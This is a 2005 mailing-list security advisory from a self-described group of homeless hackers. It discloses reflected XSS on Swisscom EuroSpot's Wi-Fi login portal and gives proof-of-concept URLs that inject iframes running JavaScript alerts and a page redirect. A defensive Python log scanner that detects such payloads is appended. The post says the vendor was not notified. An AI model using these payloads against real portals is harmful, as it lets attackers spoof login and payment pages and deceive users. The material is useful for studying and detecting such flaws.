Message-ID: <2B26CC4C-321F-4E6B-98F6-C60A0E2018B0@code511.com>
Date: Fri Oct 28 19:47:55 2005
From: adf at code511.com (deepquest)
Subject: HHU #1: "It's secure, it's reliable, it's Swiss"

       ___           ___           ___
      /__/\         /__/\         /__/\
      \  \:\        \  \:\        \  \:\
       \__\:\        \__\:\        \  \:\
   ___ /  /::\   ___ /  /::\   ___  \  \:\
  /__/\  /:/\:\ /__/\  /:/\:\ /__/\  \__\:\
  \  \:\/:/__\/ \  \:\/:/__\/ \  \:\ /  /:/
   \  \::/       \  \::/       \  \:\  /:/
    \  \:\        \  \:\        \  \:\/:/
     \  \:\        \  \:\        \  \::/
      \__\/         \__\/         \__\/



"It's secure, it's reliable, it's Swiss"


HHU
---
Homeless Hackers United is a small group of homeless hackers from Europe and
North America. We can't afford to pay for Internet access or hotel rooms.
Our only crime is to have a laptop and wireless card, and a little knowledge.
Our homeless state gives us the freedom to access and use various open systems,
accessible from public places. The following has been tested in UK, Germany,
France and Norway.

Who
---
Swisscom EuroSpot is a wireless service offered in airports, hotels and
other public places. Customers buy a certain amount of time online and get
access to the wireless network. The login page is of course open in order to
join and subscribe to the service.
HHU has been able to access and validate this in several hotels and public
places.

Severity
--------
Medium

Vulnerability
-------------
XSS, URL evasion

Details
-------
Swisscom access points seem to use RADIUS servers to provide Internet access to
their customers. We also noticed issues in the RADIUS authentication process
that may be published later. After joining the network you will have either to
buy access time or log in. The following has been tested in UK, Germany, France
and Norway.

http://login**.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI=XSS
http://login**.swisscom-eurospot.com/login.php?LANG=de&UserID=0&RadiusReply=XSS

Proof of Concept
----------------
http://login02.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI=Please%20fix%20this%20site
http://login02.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI=%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
http://login02.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI=%3CIFRAME%20SRC=javascript:window.parent.location.replace(%2527http://google.com%2527)%3E%3C/IFRAME%3E

Impacts
-------
Change, spoof and fool end-users on the login page or payment page. With a bit
of imagination it can be worse.

Timeline
--------
Discovered: August  14th 2005
Disclosure: October 28th 2005
Service Provider: no

HHU Policy
----------
HHU can't even afford food, and we are not paid to debug software or systems
for free.
We discover, then publish what we find. Will route tcp/ip packets for food!
"Fool me once, shame on -- shame on you. Fool me -- you can't get fooled again."
-- George W. Bush


HHU Credits
-----------
deepquest for discovering and POC, Mescalito for more POC.
original post http://deepquest.code511.com/blog/more.php?id=319_0_1_0_M
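
An added example, not part of the original post and not Swisscom code: a Python check a portal operator could run over web-server request lines to spot markup reaching the two reflected parameters named above (UI and RadiusReply), including the double percent-encoding (%2527) seen in the proof of concept. The sample request lines are constructed from the advisory's paths and parameter names; the regex and the decode bound are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameters the advisory reports as reflected into the portal pages.
REFLECTED_PARAMS = {"UI", "RadiusReply"}
# Markup or script-scheme indicators in a fully decoded value (assumed pattern).
SUSPICIOUS = re.compile(r"[<>]|javascript\s*:", re.IGNORECASE)
MAX_DECODE_ROUNDS = 5  # assumption: upper bound on nested percent-encoding


def fully_decode(value: str) -> tuple[str, int]:
    """Percent-decode until the value stops changing; return (text, rounds applied)."""
    rounds = 0
    while rounds < MAX_DECODE_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def scan_request(path_and_query: str) -> list[dict]:
    """Return one finding per reflected parameter whose decoded value holds markup."""
    findings = []
    query = urlsplit(path_and_query).query
    # parse_qsl performs the first decoding pass, as the web server would.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name not in REFLECTED_PARAMS:
            continue
        # Any further rounds mean the value was encoded more than once.
        text, extra = fully_decode(value)
        if SUSPICIOUS.search(text):
            findings.append({"param": name, "decoded": text, "double_encoded": extra > 0})
    return findings


# Constructed sample requests (paths and parameter names taken from the advisory).
SAMPLE_REQUESTS = [
    "/error.php?error=nasunknown_ui&UI=Please%20fix%20this%20site",
    "/error.php?error=nasunknown_ui&UI=%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E",
    "/login.php?LANG=de&UserID=0&RadiusReply=Access%20denied",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        for f in scan_request(req):
            print(f"ALERT {f['param']} double_encoded={f['double_encoded']}: {f['decoded']}")
```

The first sample request carries no markup and is not flagged, although it still shows attacker-chosen text on the page, so the server-side fix remains HTML-encoding both parameters on output.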
